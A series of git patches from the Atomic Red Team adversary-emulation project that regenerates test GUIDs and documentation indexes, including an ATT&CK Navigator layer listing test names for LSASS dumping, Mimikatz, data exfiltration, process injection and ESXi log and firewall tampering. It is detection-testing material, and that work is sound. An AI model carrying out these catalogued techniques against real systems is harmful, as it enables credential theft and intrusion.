a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 0ee6159345..ecbd6af463 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -264,7 +264,6 @@ atomic_tests: cleanup_command: | rmuser -y art - name: ESXi - Brute Force Until Account Lockout - auto_generated_guid: f0b443ae-9565-11ee-b9d1-0242ac120002 description: | An adversary may attempt to brute force the password of privilleged account for privilege escalation. In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) 
diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index 2104fbdd1b..ba22d7dbd6 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml @@ -316,7 +316,6 @@ atomic_tests: name: bash elevation_required: false - name: ESXi - Remove Syslog remote IP - auto_generated_guid: 8241dda4-962e-11ee-b9d1-0242ac120002 description: | An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. supported_platforms: diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index 687398abe6..b60a1fcf68 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -440,7 +440,6 @@ atomic_tests: name: command_prompt elevation_required: true - name: ESXi - Disable Firewall via Esxcli - auto_generated_guid: 8710d396-96e5-11ee-b9d1-0242ac120002 description: | Adversaries may disable the ESXI firewall via ESXCLI supported_platforms: From 21401622e491c1c7c6b7d6837f59bb4464c19860 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Sun, 25 Feb 2024 01:15:31 +0000 Subject: [PATCH 17/41] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1003.003/T1003.003.yaml | 1 + atomics/T1110.001/T1110.001.yaml | 1 + atomics/T1137.001/T1137.001.yaml | 1 + atomics/T1218.011/T1218.011.yaml | 1 + atomics/T1560.001/T1560.001.yaml | 1 + atomics/T1562.004/T1562.004.yaml | 1 + atomics/used_guids.txt | 6 ++++++ 7 files changed, 12 insertions(+) diff --git a/atomics/T1003.003/T1003.003.yaml b/atomics/T1003.003/T1003.003.yaml index 4a82ae2844..50f69f6b45 100644 --- a/atomics/T1003.003/T1003.003.yaml +++ b/atomics/T1003.003/T1003.003.yaml 
@@ -244,6 +244,7 @@ atomic_tests: elevation_required: true - name: Create Volume Shadow Copy with diskshadow + auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7 description: | This test is intended to be run on a domain controller An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index ecbd6af463..3ec16bf7bd 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -264,6 +264,7 @@ atomic_tests: cleanup_command: | rmuser -y art - name: ESXi - Brute Force Until Account Lockout + auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 description: | An adversary may attempt to brute force the password of privilleged account for privilege escalation. In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) diff --git a/atomics/T1137.001/T1137.001.yaml b/atomics/T1137.001/T1137.001.yaml index 2d74695135..1f6b599e4e 100644 --- a/atomics/T1137.001/T1137.001.yaml +++ b/atomics/T1137.001/T1137.001.yaml @@ -2,6 +2,7 @@ attack_technique: T1137.001 display_name: 'Office Application Startup: Office Template Macros.' atomic_tests: - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell + auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8 description: | Injects a Macro in the Word default template "Normal.dotm" and makes it execute each time that Word is opened. In this test, the Macro creates a sheduled task to open Calc.exe every evening. supported_platforms: diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 6464ce738d..175f7815d0 100644 --- a/atomics/T1218.011/T1218.011.yaml 
+++ b/atomics/T1218.011/T1218.011.yaml @@ -297,6 +297,7 @@ atomic_tests: cleanup_command: del not_an_scr.scr - name: Running DLL with .init extension and function + auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6 description: | This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. DLL created with the AtomicTestHarnesses Portable Executable Builder script. diff --git a/atomics/T1560.001/T1560.001.yaml b/atomics/T1560.001/T1560.001.yaml index ba22d7dbd6..e8ec287c9b 100644 --- a/atomics/T1560.001/T1560.001.yaml +++ b/atomics/T1560.001/T1560.001.yaml @@ -316,6 +316,7 @@ atomic_tests: name: bash elevation_required: false - name: ESXi - Remove Syslog remote IP + auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2 description: | An adversary may edit the syslog config to remove the loghost in order to prevent or redirect logs being received by SIEM. supported_platforms: diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index b60a1fcf68..a2ec688f54 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -440,6 +440,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: ESXi - Disable Firewall via Esxcli + auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a description: | Adversaries may disable the ESXI firewall via ESXCLI supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index df2704ee2d..c2bd284c0e 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt 
@@ -1561,3 +1561,9 @@ eea0a6c2-84e9-4e8c-a242-ac585d28d0d1 0e7b8a4b-2ca5-4743-a9f9-96051abb6e50 6a5b2a50-d037-4879-bf01-43d4d6cbf73f 4099086c-1470-4223-8085-8186e1ed5948 +b385996c-0e7d-4e27-95a4-aca046b119a7 +ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 +940db09e-80b6-4dd0-8d4d-7764f89b47a8 +2d5029f0-ae20-446f-8811-e7511b58e8b6 +36c62584-d360-41d6-886f-d194654be7c2 +bac8a340-be64-4491-a0cc-0985cb227f5a From ae87c3e1857ba9c48e0405659846d78b751eb58b Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Sun, 25 Feb 2024 01:15:48 +0000 Subject: [PATCH 18/41] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 6 + atomics/Indexes/Indexes-CSV/windows-index.csv | 6 + atomics/Indexes/Indexes-Markdown/index.md | 8 +- .../Indexes-Markdown/office-365-index.md | 2 +- .../Indexes/Indexes-Markdown/windows-index.md | 8 +- atomics/Indexes/Matrices/matrix.md | 2 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/azure-ad-index.yaml | 3 +- atomics/Indexes/containers-index.yaml | 3 +- atomics/Indexes/google-workspace-index.yaml | 3 +- atomics/Indexes/iaas-index.yaml | 3 +- atomics/Indexes/iaas_aws-index.yaml | 3 +- atomics/Indexes/iaas_azure-index.yaml | 3 +- atomics/Indexes/iaas_gcp-index.yaml | 3 +- atomics/Indexes/index.yaml | 289 +++++++++++++++++- atomics/Indexes/linux-index.yaml | 3 +- atomics/Indexes/macos-index.yaml | 3 +- atomics/Indexes/office-365-index.yaml | 3 +- atomics/Indexes/saas-index.yaml | 3 +- atomics/Indexes/windows-index.yaml | 289 +++++++++++++++++- atomics/T1003.003/T1003.003.md | 37 +++ atomics/T1110.001/T1110.001.md | 36 ++- atomics/T1137.001/T1137.001.md | 188 ++++++++++++ atomics/T1218.011/T1218.011.md | 50 +++ atomics/T1560.001/T1560.001.md | 83 ++--- atomics/T1562.004/T1562.004.md | 32 +- 28 files changed, 986 insertions(+), 89 deletions(-) create mode 100644 atomics/T1137.001/T1137.001.md 
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 4a2df1ccf1..bdf1bc9041 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":39,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump 
volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with 
ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl 
windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via 
Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic 
